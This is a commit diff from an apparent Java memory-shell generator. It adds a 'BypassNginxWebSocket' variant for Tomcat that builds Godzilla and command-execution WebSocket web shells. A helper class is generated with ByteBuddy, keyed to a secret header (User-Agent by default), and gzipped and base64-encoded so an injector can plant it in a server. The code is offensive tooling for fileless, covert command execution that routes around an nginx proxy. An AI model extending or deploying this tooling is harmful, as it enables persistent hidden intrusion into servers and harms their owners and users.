feat: support Tomcat Command WebSocketBypassNginx

Author: ReaJason

boot/src/main/java/com/reajason/javaweb/boot/dto/MemShellGenerateRequest.java

@@ -51,6 +51,8 @@ public ShellToolConfig parseShellToolConfig() {
             case Command -> CommandConfig.builder()
                     .shellClassName(shellToolConfig.getShellClassName())
                     .paramName(shellToolConfig.getCommandParamName())
+                    .headerName(shellToolConfig.getHeaderName())
+                    .headerValue(shellToolConfig.getHeaderValue())
                     .template(shellToolConfig.getCommandTemplate())
                     .encryptor(CommandConfig.Encryptor.fromString(shellToolConfig.getEncryptor()))
                     .implementationClass(CommandConfig.ImplementationClass.fromString(shellToolConfig.getImplementationClass()))

generator/src/main/java/com/reajason/javaweb/memshell/MemShellGenerator.java

@@ -5,6 +5,7 @@
 import com.reajason.javaweb.memshell.config.ShellConfig;
 import com.reajason.javaweb.memshell.config.ShellToolConfig;
 import com.reajason.javaweb.memshell.generator.InjectorGenerator;
+import com.reajason.javaweb.memshell.generator.WebSocketByPassHelperGenerator;
 import com.reajason.javaweb.memshell.server.AbstractServer;
 import com.reajason.javaweb.probe.ProbeContent;
 import com.reajason.javaweb.probe.ProbeMethod;
@@ -63,6 +64,11 @@ public static MemShellResult generate(ShellConfig shellConfig, InjectorConfig in
         injectorConfig.setShellClassName(shellToolConfig.getShellClassName());
         injectorConfig.setShellClassBytes(shellBytes);
 
+        if (ShellType.BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType())
+                || ShellType.JAKARTA_BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType())) {
+            injectorConfig.setHelperClassBytes(WebSocketByPassHelperGenerator.getBytes(shellConfig, shellToolConfig));
+        }
+
         InjectorGenerator injectorGenerator = new InjectorGenerator(shellConfig, injectorConfig);
         byte[] injectorBytes = injectorGenerator.generate();
         if (shellConfig.isProbe() && !shellConfig.getShellType().startsWith(ShellType.AGENT)) {

generator/src/main/java/com/reajason/javaweb/memshell/ServerFactory.java

@@ -60,6 +60,8 @@ public class ServerFactory {
                 .addShellClass(JAKARTA_PROXY_VALVE, Godzilla.class)
                 .addShellClass(WEBSOCKET, GodzillaWebSocket.class)
                 .addShellClass(JAKARTA_WEBSOCKET, GodzillaWebSocket.class)
+                .addShellClass(BYPASS_NGINX_WEBSOCKET, GodzillaWebSocket.class)
+                .addShellClass(JAKARTA_BYPASS_NGINX_WEBSOCKET, GodzillaWebSocket.class)
                 .addShellClass(SPRING_WEBMVC_INTERCEPTOR, GodzillaInterceptor.class)
                 .addShellClass(SPRING_WEBMVC_JAKARTA_INTERCEPTOR, GodzillaInterceptor.class)
                 .addShellClass(SPRING_WEBMVC_CONTROLLER_HANDLER, GodzillaControllerHandler.class)
@@ -137,6 +139,8 @@ public class ServerFactory {
                 .addShellClass(JAKARTA_PROXY_VALVE, Command.class)
                 .addShellClass(WEBSOCKET, CommandWebSocket.class)
                 .addShellClass(JAKARTA_WEBSOCKET, CommandWebSocket.class)
+                .addShellClass(BYPASS_NGINX_WEBSOCKET, CommandWebSocket.class)
+                .addShellClass(JAKARTA_BYPASS_NGINX_WEBSOCKET, CommandWebSocket.class)
                 .addShellClass(UPGRADE, CommandUpgrade.class)
                 .addShellClass(SPRING_WEBMVC_INTERCEPTOR, CommandInterceptor.class)
                 .addShellClass(SPRING_WEBMVC_JAKARTA_INTERCEPTOR, CommandInterceptor.class)

generator/src/main/java/com/reajason/javaweb/memshell/ShellType.java

@@ -45,7 +45,9 @@ public class ShellType {
     public static final String SPRING_WEBFLUX_HANDLER_METHOD = "HandlerMethod";
     public static final String SPRING_WEBFLUX_HANDLER_FUNCTION = "HandlerFunction";
     public static final String WEBSOCKET = "WebSocket";
+    public static final String BYPASS_NGINX_WEBSOCKET = "BypassNginx" + WEBSOCKET;
     public static final String JAKARTA_WEBSOCKET = "JakartaWebSocket";
+    public static final String JAKARTA_BYPASS_NGINX_WEBSOCKET = "JakartaWebBypassNginx" + WEBSOCKET;
 
     public static final String ACTION = "Action";
 }

generator/src/main/java/com/reajason/javaweb/memshell/config/CommandConfig.java

@@ -22,6 +22,18 @@ public class CommandConfig extends ShellToolConfig {
     @Builder.Default
     private String paramName = CommonUtil.getRandomString(8);
 
+    /**
+     * 只有在 WebSocket Bypass 的时候才有用，防止对业务的干扰
+     */
+    @Builder.Default
+    private String headerName = "User-Agent";
+
+    /**
+     * 只有在 WebSocket Bypass 的时候才有用，防止对业务的干扰
+     */
+    @Builder.Default
+    private String headerValue = CommonUtil.getRandomString(8);
+
     /**
      * 加密器
      */
@@ -48,6 +60,22 @@ public B paramName(String paramName) {
             }
             return self();
         }
+
+        public B headerName(final String headerName) {
+            if (StringUtils.isNotBlank(headerName)) {
+                this.headerName$value = headerName;
+                headerName$set = true;
+            }
+            return self();
+        }
+
+        public B headerValue(final String headerValue) {
+            if (StringUtils.isNotBlank(headerValue)) {
+                this.headerValue$value = headerValue;
+                headerValue$set = true;
+            }
+            return self();
+        }
     }
 
 

generator/src/main/java/com/reajason/javaweb/memshell/config/InjectorConfig.java

@@ -16,37 +16,38 @@
 @AllArgsConstructor
 @Builder(toBuilder = true)
 public class InjectorConfig {
-    /**
-     * 注入器 Builder
-     */
-    DynamicType.Builder<?> injectorBuilder;
-    /**
-     * 内存马 Builder
-     */
-    DynamicType.Builder<?> shellBuilder;
     /**
      * 注入器模板类
      */
     private Class<?> injectorClass;
+
     /**
      * 注入器类名
      */
     @Builder.Default
     private String injectorClassName = CommonUtil.generateInjectorClassName();
+
     /**
      * 注入访问的地址
      */
     @Builder.Default
     private String urlPattern = "/*";
+
     /**
      * 内存马类名
      */
     private String shellClassName;
+
     /**
      * 内存马类字节
      */
     private byte[] shellClassBytes;
 
+    /**
+     * 辅助类字节码
+     */
+    private byte[] helperClassBytes;
+
     /**
      * 添加静态代码块调用构造方法初始化
      */

generator/src/main/java/com/reajason/javaweb/memshell/generator/InjectorGenerator.java

@@ -49,6 +49,12 @@ public DynamicType.Builder<?> getBuilder() {
                 .method(named("getBase64String")).intercept(FixedValue.value(base64String))
                 .method(named("getClassName")).intercept(FixedValue.value(injectorConfig.getShellClassName()));
 
+        byte[] helperClassBytes = injectorConfig.getHelperClassBytes();
+        if (helperClassBytes != null) {
+            String helperBase64 = Base64.getEncoder().encodeToString(CommonUtil.gzipCompress(helperClassBytes));
+            builder = builder.method(named("getHelperBase64String")).intercept(FixedValue.value(helperBase64));
+        }
+
         if (shellConfig.needByPassJavaModule()) {
             builder = ByPassJavaModuleInterceptor.extend(builder);
         }

generator/src/main/java/com/reajason/javaweb/memshell/generator/WebSocketByPassHelperGenerator.java

@@ -0,0 +1,56 @@
+package com.reajason.javaweb.memshell.generator;
+
+import com.reajason.javaweb.ClassBytesShrink;
+import com.reajason.javaweb.GenerationException;
+import com.reajason.javaweb.Server;
+import com.reajason.javaweb.buddy.ServletRenameVisitorWrapper;
+import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper;
+import com.reajason.javaweb.memshell.config.CommandConfig;
+import com.reajason.javaweb.memshell.config.GodzillaConfig;
+import com.reajason.javaweb.memshell.config.ShellConfig;
+import com.reajason.javaweb.memshell.config.ShellToolConfig;
+import com.reajason.javaweb.memshell.shelltool.wsbypass.TomcatWsBypassValve;
+import com.reajason.javaweb.utils.CommonUtil;
+import net.bytebuddy.ByteBuddy;
+import net.bytebuddy.dynamic.DynamicType;
+import org.apache.commons.lang3.tuple.Pair;
+
+import static net.bytebuddy.matcher.ElementMatchers.named;
+
+/**
+ * @author ReaJason
+ * @since 2026/1/13
+ */
+public class WebSocketByPassHelperGenerator {
+    public static byte[] getBytes(ShellConfig shellConfig, ShellToolConfig shellToolConfig) {
+        Pair<String, String> headerPair = getHeaderPair(shellToolConfig);
+        if (headerPair == null) {
+            throw new GenerationException("unsupported shell config: " + shellConfig.getShellTool());
+        }
+
+        if (Server.Tomcat.equals(shellConfig.getServer())) {
+            DynamicType.Builder<TomcatWsBypassValve> builder = new ByteBuddy()
+                    .redefine(TomcatWsBypassValve.class)
+                    .visit(new TargetJreVersionVisitorWrapper(shellConfig.getTargetJreVersion()))
+                    .field(named("headerName")).value(headerPair.getKey())
+                    .field(named("headerValue")).value(headerPair.getValue())
+                    .name(CommonUtil.generateClassName());
+            if (shellConfig.isJakarta()) {
+                builder = builder.visit(ServletRenameVisitorWrapper.INSTANCE);
+            }
+            try (DynamicType.Unloaded<TomcatWsBypassValve> dynamicType = builder.make()) {
+                return ClassBytesShrink.shrink(dynamicType.getBytes(), shellConfig.isShrink());
+            }
+        }
+        return null;
+    }
+
+    private static Pair<String, String> getHeaderPair(ShellToolConfig shellToolConfig) {
+        if (shellToolConfig instanceof CommandConfig) {
+            return Pair.of(((CommandConfig) shellToolConfig).getHeaderName(), ((CommandConfig) shellToolConfig).getHeaderValue());
+        } else if (shellToolConfig instanceof GodzillaConfig) {
+            return Pair.of(((GodzillaConfig) shellToolConfig).getHeaderName(), ((GodzillaConfig) shellToolConfig).getHeaderValue());
+        }
+        return null;
+    }
+}